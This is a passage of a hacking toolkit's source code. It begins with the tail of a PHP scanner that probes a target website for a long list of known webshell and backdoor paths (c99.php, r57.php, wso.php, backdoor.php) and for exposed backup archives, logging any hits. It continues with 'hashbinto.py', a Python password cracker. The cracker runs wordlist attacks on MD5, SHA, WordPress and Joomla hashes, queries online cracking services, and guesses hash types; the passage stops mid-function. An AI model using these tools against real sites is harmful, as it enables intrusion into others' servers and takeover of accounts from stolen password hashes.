'forum.rar','joomla.zip','joomla.rar','wp.php','buck.sql','sysadmin.php','images/c99.php', 'xd.php', 'c100.php', 161 | 'spy.aspx','xd.php','tmp/xd.php','sym/root/home/','billing/killer.php','tmp/upload.php','tmp/admin.php', 162 | 'Server.php','tmp/uploads.php','tmp/up.php','Server/','wp-admin/c99.php','tmp/priv8.php','priv8.php','cgi.pl/', 163 | 'tmp/cgi.pl','downloads/dom.php','templates/ja-helio-farsi/index.php','webadmin.html','admins.php',"/wordpress-3.6-en.zip","/Joomla.zip","/joomla.zip","/backup1.zip" 164 | ,"/wordpress-4.0-ar.zip","/wordpress-4.0.zip","/wordpress-3.6-en_CA.zip","/wordpress-3.6-ar.zip" 165 | ,"/Joomla_3.3.6-Stable-Full_Package.zip","/Joomla_2.5.27-Stable-Full_Package.zip" 166 | ,"/public_html.zip","/backup.zip","/vb.zip","/vb3.zip","/wcmadmin/index.php" 167 | ,"/administrator.zip","/admin.zip","/new.zip","/up.zip","/upload.zip","/phpinfo.php","/info.php","/upload1.zip" 168 | ,"/upload2.zip","/wordpress-3.8-tr_TR.zip","/wordpress-3.9.1-he_IL.zip","/wordpress-3.8.zip" 169 | ,"/zoldick.php","/wp.zip","/includes/config.php~","/wordpress.zip","/admin","/login.php","/Log-in.html","/404.php" 170 | ,"/r57.php","/shell.php","/sql","/pro.php","/upload.php","/priv8.php","/c99.php","/404.php","/wso.php","/admin.php","/DZ.php","/scama","/paypal" 171 | ,"/5.php","/hacker","/dz.php","/login.php","/members.php","/backdoor.php","/angel.php","/123.php","/admin.aspx",'/login.php','purchasing_login.php','okbye.php','/phpMyAdmin','/adminG7sus4','/_admin','/admin1/index.php'); 172 | 173 | $list1 = str_replace('/', '', $list); 174 | foreach ($list1 as $path){ 175 | 176 | $get = get_headers("http://".$site1."/".$path); 177 | 178 | if ($site1 == null) { 179 | if( stristr( php_uname( 's' ), 'Windows NT' ) ) { 180 | // Windows 181 | $cmd = system( 'cls' ); 182 | echo $art; 183 | } 184 | else { 185 | // *nix 186 | $cmd = system( 'clear' ); 187 | echo $art; 188 | } 189 | 190 | } 191 | 192 | if(preg_match("/200/",$get[0])) 193 | { 194 | echo "\033[1;31m[+]\033[1;m"."\033[1;34mFound=>>\033[1;m"." \033[1;32mhttp://$site1/$path\033[1;m\n"; 195 | $open1 = fopen("rezultsite.txt", "a"); 196 | $write = fwrite($open1, "http://$site1/$path\n"); 197 | fclose($open1); 198 | } 199 | } 200 | 201 | } 202 | 203 | ?> 204 | -------------------------------------------------------------------------------- /hashbinto.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # encoding: utf-8 3 | ###################################### 4 | # Coded By w0lgix g(Anonsniper) # 5 | ###################################### 6 | import sys 7 | import os 8 | import platform 9 | import hashlib 10 | import urllib 11 | import urllib2 12 | import re 13 | import cookielib 14 | from socket import* 15 | import threading 16 | import time 17 | from passlib.hash import phpass 18 | import string 19 | 20 | 21 | 22 | logo= """ 23 | 24 | \033[1;31m/$$ /$$ /$$ /$$$$$$ /$$ \033[1;m 25 | \033[1;32m| $$ | $$ | $$ /$$__ $$ | $$ \033[1;m 26 | \033[1;33m| $$ | $$ /$$$$$$ /$$$$$$$| $$$$$$$ | $$ \__/ /$$$$$$ /$$$$$$ /$$$$$$$| $$ /$$\033[1;m 27 | \033[1;34m| $$$$$$$$ |____ $$ /$$_____/| $$__ $$ | $$ /$$__ $$|____ $$ /$$_____/| $$ /$$/\033[1;m 28 | \033[1;35m| $$__ $$ /$$$$$$$| $$$$$$ | $$ \ $$ | $$ | $$ \__/ /$$$$$$$| $$ | $$$$$$/ \033[1;m 29 | \033[1;37m| $$ | $$ /$$__ $$ \____ $$| $$ | $$ | $$ $$| $$ /$$__ $$| $$ | $$_ $$ \033[1;m 30 | \033[1;30m| $$ | $$| $$$$$$$ /$$$$$$$/| $$ | $$ | $$$$$$/| $$ | $$$$$$$| $$$$$$$| $$ \ $$\033[1;m 31 | \033[1;31m|__/ |__/ \_______/|_______/ |__/ |__/ \______/ |__/ \_______/ \_______/|__/ \__/\033[1;m 32 | 33 | 34 | 35 | \033[1;47mCoded By w0lgix v1.2\033[1;m 36 | """ 37 | class bcolors: 38 | HEADER = '\033[95m' 39 | OKBLUE = '\033[94m' 40 | OKGREEN = '\033[92m' 41 | WARNING = '\033[93m' 42 | FAIL = '\033[91m' 43 | ENDC = '\033[0m' 44 | print logo 45 | print "\033[1;32mselect 1-9\n\033[1;m" 46 | 47 | print "\033[1;31m[1] md5 Decrypt\033[1;m" 48 | print "\033[1;33m[2] md5 Decrypt Online\033[1;m" 49 | print "\033[1;34m[3] sha1 Decrypt\033[1;m" 50 | print "\033[1;35m[4] sha256 Decrypt\033[1;m" 51 | print "\033[1;32m[5] sha384 Decrypt\033[1;m" 52 | print "\033[1;36m[6] sha512 Decrypt\033[1;m" 53 | print "\033[1;31m[7] wordpress Decrypt\033[1;m" 54 | print "\033[1;33m[8] Joomla Decrypt\033[1;m" 55 | print "\033[1;37m[9] Type Hash\033[1;m" 56 | 57 | 58 | type1 = raw_input("") 59 | 60 | os.system('clear') 61 | print logo 62 | if type1 == '1': 63 | hash1 = raw_input('Hash: ') 64 | wordlist = raw_input('wordlist path: ') 65 | password = open(wordlist,'r') 66 | read = password.readlines() 67 | for i in read: 68 | i = i.strip('\n') 69 | hash_object = hashlib.md5(i.encode()) 70 | hash2 = hash_object.hexdigest() 71 | if hash1 == hash2: 72 | os.system('clear') 73 | print logo 74 | print '[+]',hash1 + " :",i+"\n" 75 | break 76 | else: 77 | os.system('clear') 78 | print logo 79 | print "Not Found Hash!!" 80 | sys.exit(0) 81 | 82 | elif type1 == '3': 83 | hash1 = raw_input('Hash: ') 84 | wordlist = raw_input('wordlist path: ') 85 | password = open(wordlist,'r') 86 | read = password.readlines() 87 | for i in read: 88 | i = i.strip('\n') 89 | hash_object = hashlib.sha1(i.encode()) 90 | hash2 = hash_object.hexdigest() 91 | if hash1 == hash2: 92 | os.system('clear') 93 | print logo 94 | print '[+]',hash1 + ' :',i 95 | break 96 | else: 97 | os.system('clear') 98 | print logo 99 | print 'Not Found Hash!!' 100 | sys.exit(0) 101 | 102 | elif type1 == '4': 103 | hash1 = raw_input('Hash: ') 104 | wordlist = raw_input('wordlist path: ') 105 | password = open(wordlist,'r') 106 | read = password.readlines() 107 | for i in read: 108 | i = i.strip('\n') 109 | hash_object = hashlib.sha256(i.encode()) 110 | hash2 = hash_object.hexdigest() 111 | if hash1 == hash2: 112 | os.system('clear') 113 | print logo 114 | print '[+]',hash1 + ' :',i 115 | break 116 | else: 117 | os.system('clear') 118 | print logo 119 | print 'Not Found Hash!!' 120 | sys.exit(0) 121 | 122 | elif type1 == '5': 123 | hash1 = raw_input('Hash: ') 124 | wordlist = raw_input('wordlist path: ') 125 | password = open(wordlist,'r') 126 | read = password.readlines() 127 | for i in read: 128 | i = i.strip('\n') 129 | hash_object = hashlib.sha384(i.encode()) 130 | hash2 = hash_object.hexdigest() 131 | if hash1 == hash2: 132 | os.system('clear') 133 | print logo 134 | print '[+]',hash1 + ' :',i 135 | break 136 | else: 137 | os.system('clear') 138 | print logo 139 | print 'Not Found Hash!!' 140 | sys.exit(0) 141 | 142 | 143 | elif type1 == '7': 144 | #$P$B8Qf5pBeISJFRTaVAMBjIcj4T8F46T. 145 | #$P$BYDDY5m0963UI2I/0IEj0Dbp5CaMeP0 146 | 147 | hash = raw_input("Hash: ") #~exemple : $P$FDj9XhuS43ooqUPB4EVddWAT5lCWyA1 148 | passl = raw_input('wordlist path: ') #~change it by wordlist name 149 | threads = 1 150 | try: 151 | plist = open(passl).readlines() 152 | except: 153 | print bcolors.FAIL + "| We cant find 1 required list !" 154 | #-------------------------------------------------------- 155 | def crack(password): 156 | hashed = phpass.verify(password, hash) 157 | hashedpass = str(hashed) + ":" + str(password) 158 | if hashedpass == "True:" + password : 159 | print bcolors.OKGREEN + "+---------------------------------------+" 160 | print bcolors.OKGREEN + "| Operation Completed !" 161 | print bcolors.OKGREEN + "| HASH > " + " " + hash 162 | print bcolors.OKGREEN + "| password >" + " " + password 163 | print bcolors.OKGREEN + "+---------------------------------------+" 164 | sys.exit(1) 165 | #-------------------------------------------------------- 166 | print bcolors.OKBLUE + "+---------------------------------------+" 167 | print bcolors.OKBLUE + "| Cracking Please Wait ..." 168 | print bcolors.OKBLUE + "| Loaded %s passwords !" % len(plist) 169 | print bcolors.OKBLUE + "+---------------------------------------+" 170 | for password in plist: 171 | password = password.rstrip() 172 | for i in xrange(threads): 173 | t = threading.Thread(target=crack(password)) 174 | t.start() 175 | #-------------------------------------------------------- 176 | 177 | sys.exit() 178 | elif type1 == '2': 179 | 180 | mhash= raw_input('please enter the hash to crack :') 181 | print "\n\n[+]Cracking..." 182 | f=urllib.urlopen("http://md5.gromweb.com/?md5="+mhash) 183 | tas= f.read() 184 | link=re.compile(''+'\w+') 185 | 186 | if link.search(tas): 187 | a= link.search(tas).group() 188 | print("\033[1;32m\n \n[+]Hash Cracked from md5broweb.com \n\033[1;m") 189 | strip = a.strip('') 190 | print "\033[1;34mvalue="+mhash+':'+strip+'\033[1;m' 191 | else: 192 | print ("\n[+] Hash not found on md5broweb.com\n") 193 | 194 | 195 | 196 | url="http://md5decrypt.net/en/" 197 | data="hash="+mhash+"&decrypt=Decrypt" 198 | 199 | req = urllib2.Request(url,data) 200 | 201 | f=urllib2.urlopen(req) 202 | tas= f.read() 203 | 204 | link=re.compile(': '+'\w+') 205 | 206 | if link.search(tas): 207 | a= link.search(tas).group() 208 | print("\033[1;33m\n \n[+]Hash Cracked from md5decrypt.net \n\033[1;m") 209 | strip1 = a.strip(':
') 210 | print "value="+mhash+':'+strip+'\033[1;m\n\n' 211 | 212 | else: 213 | print ("[+] Hash not found on md5decrypt.net\n") 214 | 215 | 216 | f=urllib2.urlopen("http://md5cracker.org/api/api.cracker.php?r=1421&database=md5online.net&hash="+mhash) 217 | tas= f.read() 218 | 219 | link=re.compile('lt":"\w+') 220 | 221 | if link.search(tas): 222 | a= link.search(tas).group() 223 | print("\033[1;35m[+]Hash Cracked from md5cracker.net \n\033[1;m") 224 | strip1 = a.strip('lt":"') 225 | print "\033[1;31mvalue="+mhash+':'+strip1+'\n\n' 226 | 227 | else: 228 | print "[+] Hash not found on md5decrypt.net\n" 229 | 230 | f1=urllib2.urlopen("http://md5cracker.org/api/api.cracker.php?r=4954&database=md5.my-addr.com&hash="+mhash) 231 | tas1= f1.read() 232 | 233 | link1=re.compile('lt":"\w+') 234 | 235 | if link1.search(tas1): 236 | a=link1.search(tas1).group() 237 | print("\033[1;36m[+]Hash Cracked from md5.my-addr.com \n\033[1;m") 238 | strip1 = a.strip('lt":"') 239 | print "\033[1;30mvalue="+mhash+':'+strip1+'\n\n\033[1;m' 240 | 241 | else: 242 | print "[+] Hash not found on md5.my-addr.com\n" 243 | 244 | 245 | f1=urllib2.urlopen("http://md5cracker.org/api/api.cracker.php?r=880&database=md5decryption.com&hash="+mhash) 246 | tas1= f1.read() 247 | 248 | link1=re.compile('lt":"\w+') 249 | 250 | if link1.search(tas1): 251 | a=link1.search(tas1).group() 252 | print("\033[1;37m[+]Hash Cracked from md5decryption.com \n\033[1;m") 253 | strip1 = a.strip('lt":"') 254 | print "\033[1;32mvalue="+mhash+':'+strip1+'\n\n\033[1;m' 255 | 256 | else: 257 | print "[+] Hash not found on md5decryption.com\n" 258 | 259 | f1=urllib2.urlopen("http://md5cracker.org/api/api.cracker.php?r=9940&database=md5.net&hash="+mhash) 260 | tas1= f1.read() 261 | 262 | link1=re.compile('lt":"\w+') 263 | 264 | if link1.search(tas1): 265 | a=link1.search(tas1).group() 266 | print("\033[1;34m[+]Hash Cracked from md5.net \n\033[1;m") 267 | strip1 = a.strip('lt":"') 268 | print "\033[1;35mvalue="+mhash+':'+strip1+'\n\n\033[1;m' 269 | 270 | else: 271 | print "[+] Hash not found on md5.net\n" 272 | 273 | f1=urllib2.urlopen("http://md5cracker.org/api/api.cracker.php?r=2687&database=md5crack&hash="+mhash) 274 | tas1= f1.read() 275 | 276 | link1=re.compile('lt":"\w+') 277 | 278 | if link1.search(tas1): 279 | a=link1.search(tas1).group() 280 | print("\033[1;37m[+]Hash Cracked from md5crack \n\033[1;m") 281 | strip1 = a.strip('lt":"') 282 | print "\033[1;31mvalue="+mhash+':'+strip1+'\n\n\033[1;m' 283 | 284 | else: 285 | print "[+] Hash not found on md5crack\n" 286 | 287 | f1=urllib2.urlopen("http://md5cracker.org/api/api.cracker.php?r=4972&database=netmd5crack&hash="+mhash) 288 | tas1= f1.read() 289 | 290 | link1=re.compile('lt":"\w+') 291 | 292 | if link1.search(tas1): 293 | a=link1.search(tas1).group() 294 | print("\033[1;34m[+]Hash Cracked from netmd5crack \n\033[1;m") 295 | strip1 = a.strip('lt":"') 296 | print "\033[1;36mvalue="+mhash+':'+strip1+'\n\n\033[1;m' 297 | 298 | else: 299 | print "[+] Hash not found on netmd5crack\n" 300 | 301 | f1=urllib2.urlopen("http://md5cracker.org/api/api.cracker.php?r=6573&database=authsecu&hash="+mhash) 302 | tas1= f1.read() 303 | 304 | link1=re.compile('lt":"\w+') 305 | 306 | if link1.search(tas1): 307 | a=link1.search(tas1).group() 308 | print("\033[1;37m[+]Hash Cracked from authsecu \n\033[1;m") 309 | strip1 = a.strip('lt":"') 310 | print "\033[1;30mvalue="+mhash+':'+strip1+'\n\n\033[1;m' 311 | 312 | else: 313 | print "[+] Hash not found on authsecu\n" 314 | 315 | f1=urllib2.urlopen("http://md5cracker.org/api/api.cracker.php?r=5916&database=md5pass&hash="+mhash) 316 | tas1= f1.read() 317 | 318 | link1=re.compile('lt":"\w+') 319 | 320 | if link1.search(tas1): 321 | a=link1.search(tas1).group() 322 | print("\033[1;33m[+]Hash Cracked from md5pass \n\033[1;m") 323 | strip1 = a.strip('lt":"') 324 | print "\033[1;34mvalue="+mhash+':'+strip1+'\n\n\033[1;m' 325 | 326 | else: 327 | print "[+] Hash not found on md5pass\n" 328 | 329 | f1=urllib2.urlopen("http://md5cracker.org/api/api.cracker.php?r=9236&database=i337.net&hash="+mhash) 330 | tas1= f1.read() 331 | 332 | link1=re.compile('lt":"\w+') 333 | 334 | if link1.search(tas1): 335 | a=link1.search(tas1).group() 336 | print("\033[1;37m[+]Hash Cracked from i337.net \n\033[1;m") 337 | strip1 = a.strip('lt":"') 338 | print "\033[1;32mvalue="+mhash+':'+strip1+'\n\n\033[1;m' 339 | 340 | else: 341 | print "[+] Hash not found on i337.net\n" 342 | 343 | sys.exit(0) 344 | 345 | 346 | 347 | elif type1 == '6': 348 | hash1 = raw_input('Hash: ') 349 | wordlist = raw_input('wordlist path: ') 350 | password = open(wordlist,'r') 351 | read = password.readlines() 352 | for i in read: 353 | i = i.strip('\n') 354 | hash_object = hashlib.sha512(i.encode()) 355 | hash2 = hash_object.hexdigest() 356 | if hash1 == hash2: 357 | os.system('clear') 358 | print logo 359 | print '[+]'+hash1 + ' :'+i+'\n' 360 | break 361 | else: 362 | os.system('clear') 363 | print logo 364 | print 'Not Found Hash!!' 365 | sys.exit(0) 366 | 367 | 368 | elif type1 == '8': 369 | original = raw_input("Hash: ").split(':') 370 | wordlist = raw_input("wordlist path: ") 371 | _md5 = original[0] 372 | _salt = original[1] 373 | plist = open(wordlist).readlines() 374 | 375 | for line in plist: 376 | line = line.strip() 377 | attempt = hashlib.md5(line + _salt).hexdigest() 378 | if(attempt == _md5): 379 | print bcolors.OKGREEN + "\n" + _md5 + _salt +':' + line 380 | sys.exit(0) 381 | else: 382 | print bcolors.OKBLUE+'Password not found : - ):' 383 | sys.exit(1) 384 | 385 | 386 | 387 | 388 | elif type1 == '9': 389 | os.system('clear') 390 | algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} 391 | 392 | # hash.islower() minusculas 393 | # hash.isdigit() numerico 394 | # hash.isalpha() letras 395 | # hash.isalnum() alfanumerico 396 | 397 | def CRC16(): 398 | hs='4607' 399 | if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: 400 | jerar.append("101020") 401 | def CRC16CCITT(): 402 | hs='3d08' 403 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 404 | jerar.append("101040") 405 | def FCS16(): 406 | hs='0e5b' 407 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 408 | jerar.append("101060") 409 | 410 | def CRC32(): 411 | hs='b33fd057' 412 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 413 | jerar.append("102040") 414 | def ADLER32(): 415 | hs='0607cb42' 416 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 417 | jerar.append("102020") 418 | def CRC32B(): 419 | hs='b764a0d9' 420 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 421 | jerar.append("102060") 422 | def XOR32(): 423 | hs='0000003f' 424 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 425 | jerar.append("102080") 426 | 427 | def GHash323(): 428 | hs='80000000' 429 | if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: 430 | jerar.append("103040") 431 | def GHash325(): 432 | hs='85318985' 433 | if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: 434 | jerar.append("103020") 435 | 436 | def DESUnix(): 437 | hs='ZiY8YtDKXJwYQ' 438 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: 439 | jerar.append("104020") 440 | 441 | def MD5Half(): 442 | hs='ae11fd697ec92c7c' 443 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 444 | jerar.append("105060") 445 | def MD5Middle(): 446 | hs='7ec92c7c98de3fac' 447 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 448 | jerar.append("105040") 449 | def MySQL(): 450 | hs='63cea4673fd25f46' 451 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 452 | jerar.append("105020") 453 | 454 | def DomainCachedCredentials(): 455 | hs='f42005ec1afe77967cbc83dce1b4d714' 456 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 457 | jerar.append("106025") 458 | def Haval128(): 459 | hs='d6e3ec49aa0f138a619f27609022df10' 460 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 461 | jerar.append("106160") 462 | def Haval128HMAC(): 463 | hs='3ce8b0ffd75bc240fc7d967729cd6637' 464 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 465 | jerar.append("106165") 466 | def MD2(): 467 | hs='08bbef4754d98806c373f2cd7d9a43c4' 468 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 469 | jerar.append("106060") 470 | def MD2HMAC(): 471 | hs='4b61b72ead2b0eb0fa3b8a56556a6dca' 472 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 473 | jerar.append("106120") 474 | def MD4(): 475 | hs='a2acde400e61410e79dacbdfc3413151' 476 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 477 | jerar.append("106040") 478 | def MD4HMAC(): 479 | hs='6be20b66f2211fe937294c1c95d1cd4f' 480 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 481 | jerar.append("106100") 482 | def MD5(): 483 | hs='ae11fd697ec92c7c98de3fac23aba525' 484 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 485 | jerar.append("106020") 486 | def MD5HMAC(): 487 | hs='d57e43d2c7e397bf788f66541d6fdef9' 488 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 489 | jerar.append("106080") 490 | def MD5HMACWordpress(): 491 | hs='3f47886719268dfa83468630948228f6' 492 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 493 | jerar.append("106140") 494 | def NTLM(): 495 | hs='cc348bace876ea440a28ddaeb9fd3550' 496 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 497 | jerar.append("106029") 498 | def RAdminv2x(): 499 | hs='baea31c728cbf0cd548476aa687add4b' 500 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 501 | jerar.append("106027") 502 | def RipeMD128(): 503 | hs='4985351cd74aff0abc5a75a0c8a54115' 504 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 505 | jerar.append("106180") 506 | def RipeMD128HMAC(): 507 | hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' 508 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 509 | jerar.append("106185") 510 | def SNEFRU128(): 511 | hs='4fb58702b617ac4f7ca87ec77b93da8a' 512 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 513 | jerar.append("106200") 514 | def SNEFRU128HMAC(): 515 | hs='59b2b9dcc7a9a7d089cecf1b83520350' 516 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 517 | jerar.append("106205") 518 | def Tiger128(): 519 | hs='c086184486ec6388ff81ec9f23528727' 520 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 521 | jerar.append("106220") 522 | def Tiger128HMAC(): 523 | hs='c87032009e7c4b2ea27eb6f99723454b' 524 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 525 | jerar.append("106225") 526 | def md5passsalt(): 527 | hs='5634cc3b922578434d6e9342ff5913f7' 528 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 529 | jerar.append("106240") 530 | def md5saltmd5pass(): 531 | hs='245c5763b95ba42d4b02d44bbcd916f1' 532 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 533 | jerar.append("106260") 534 | def md5saltpass(): 535 | hs='22cc5ce1a1ef747cd3fa06106c148dfa' 536 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 537 | jerar.append("106280") 538 | def md5saltpasssalt(): 539 | hs='469e9cdcaff745460595a7a386c4db0c' 540 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 541 | jerar.append("106300") 542 | def md5saltpassusername(): 543 | hs='9ae20f88189f6e3a62711608ddb6f5fd' 544 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 545 | jerar.append("106320") 546 | def md5saltmd5pass(): 547 | hs='aca2a052962b2564027ee62933d2382f' 548 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 549 | jerar.append("106340") 550 | def md5saltmd5passsalt(): 551 | hs='de0237dc03a8efdf6552fbe7788b2fdd' 552 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 553 | jerar.append("106360") 554 | def md5saltmd5passsalt(): 555 | hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' 556 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 557 | jerar.append("106380") 558 | def md5saltmd5saltpass(): 559 | hs='d8f3b3f004d387086aae24326b575b23' 560 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 561 | jerar.append("106400") 562 | def md5saltmd5md5passsalt(): 563 | hs='81f181454e23319779b03d74d062b1a2' 564 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 565 | jerar.append("106420") 566 | def md5username0pass(): 567 | hs='e44a60f8f2106492ae16581c91edb3ba' 568 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 569 | jerar.append("106440") 570 | def md5usernameLFpass(): 571 | hs='654741780db415732eaee12b1b909119' 572 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 573 | jerar.append("106460") 574 | def md5usernamemd5passsalt(): 575 | hs='954ac5505fd1843bbb97d1b2cda0b98f' 576 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 577 | jerar.append("106480") 578 | def md5md5pass(): 579 | hs='a96103d267d024583d5565436e52dfb3' 580 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 581 | jerar.append("106500") 582 | def md5md5passsalt(): 583 | hs='5848c73c2482d3c2c7b6af134ed8dd89' 584 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 585 | jerar.append("106520") 586 | def md5md5passmd5salt(): 587 | hs='8dc71ef37197b2edba02d48c30217b32' 588 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 589 | jerar.append("106540") 590 | def md5md5saltpass(): 591 | hs='9032fabd905e273b9ceb1e124631bd67' 592 | if 